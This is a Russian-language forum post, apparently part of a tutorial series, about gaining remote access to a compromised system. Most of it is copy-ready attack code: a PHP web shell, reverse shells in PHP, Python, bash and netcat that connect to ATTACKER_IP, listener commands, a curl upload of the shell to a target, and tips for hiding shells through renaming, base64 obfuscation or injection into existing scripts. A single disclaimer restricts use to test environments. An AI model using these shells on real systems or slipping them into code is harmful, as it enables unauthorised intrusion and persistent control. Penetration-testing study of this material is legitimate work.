HMCoba
Форумчанин
- Регистрация
- 14.06.2025
- Сообщения
- 20
- Реакции
- 26


Удалённый доступ: подключение к скомпрометированной системе[/B]

Часть 1 — Введение в этичный хакинг
Часть 2 — Установка Kali Linux и создание тестовой среды
Часть 3 — Тестирование уязвимостей веб-приложений
Часть 4 — Продвинутые атаки и анализ окружения
Часть 5 — Удалённый доступ и обратные подключения
Часть 6 — Повышение привилегий, поиск SUID и cron-уязвимостей
Часть 7 — Автоматизация атак с помощью Python и работа с Metasploit
Если вы нашли уязвимость в веб-приложении или системе, следующим логичным шагом будет получение удалённого доступа. В этой части мы рассмотрим, как это реализуется на практике — от загрузки шеллов до обратных подключений.

Удалённый доступ позволяет управлять системой, находящейся в другой сети, при этом взаимодействуя с ней через терминал. В пентесте это ключевой этап после эксплуатации.

Простой PHP Web Shell:
Код:
<?php system($_GET["cmd"]); ?>
Загрузка через уязвимость (например, LFI или RCE):
Код:
http://target.site/shell.php?cmd=whoami
— позволяет выполнять команды от имени веб-сервера (обычно
Код:
www-data

Reverse shell — когда целевая машина сама подключается к атакующему. Это позволяет обойти фаерволы и NAT.
Пример PHP Reverse Shell:
Код:
<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1'");
?>
На атакующей машине (Kali Linux) запускаем listener:
Код:
nc -lvnp 4444

🛠 Альтернативные методы шеллов:
Python reverse shell:
Код:
python -c 'import socket,subprocess,os; s=socket.socket(); s.connect(("ATTACKER_IP",4444)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); subprocess.call(["/bin/sh"])'
bash shell:
Код:
bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1

Если Netcat доступен:
Код:
nc ATTACKER_IP 4444 -e /bin/bash
Атакующий:
Код:
nc -lvnp 4444
🛡 Как замаскировать shell:
Вы можете изменить имя файла, расширение, использовать base64-обфускацию или внедрить код в существующий скрипт.

На атакующей стороне:
Код:
ifconfig
netstat -antp
На целевой:
Код:
curl http://ATTACKER_IP/shell.php

Код:
curl -F "file=@shell.php" http://target.site/upload.php

Обратное подключение может быть зафиксировано средствами мониторинга и журналирования. Всегда действуйте в рамках закона и только в тестовой среде.

В этом выпуске вы узнали:
- Что такое удалённый доступ и зачем он нужен
- Как получить доступ через Web Shell
- Как настроить и использовать обратное подключение
- Какие команды применяются для получения интерактивного доступа
- Как использовать Netcat и другие инструменты

- Повышение привилегий
- Поиск SUID и cron-уязвимостей
- Использование linpeas

Последнее редактирование: